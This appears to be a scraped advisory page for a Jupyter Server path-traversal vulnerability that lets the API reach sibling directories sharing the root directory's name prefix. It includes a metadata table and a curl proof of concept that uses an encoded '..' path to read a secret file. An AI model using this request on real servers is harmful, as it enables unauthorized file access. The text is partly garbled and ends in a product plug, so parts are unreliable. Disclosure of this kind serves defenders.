Summary Jupyter Server <=2.17.0 can access directories sibling to the root directory, if it starts with the root dir's name. PoC Minimal: `` . ├── test/ <root directory. │ └── test.txt └── testtest/ └── secret.txt <file…
| CVE ID | CVE-2026-35397 |
| Vendor | pip |
| Affected Product | jupyter-server |
| Vulnerability Type | Vulnerability |
| CVSS Score | 7.1 (HIGH) |
| Actively Exploited | ❌ No known exploitation |
| Patch Status | See Vendor Advisory → |
| Reported By | CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories) |
#
. ├── test/ <- root directory. │ └── test.txt └── testtest/ └── secret.txt <- file to exfiltrate that we should not be able to access via API ` `bash HOST="http://localhost:8888" TOKEN="" SIBLING="testtest" TARGET="secret.txt" curl -s -X POST \ "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \ -H "Authorization: token $TOKEN" ` Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006
in siblings directories sharing the same prefix as the root_dir`. The attacker can escalate access, reading, writing,Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.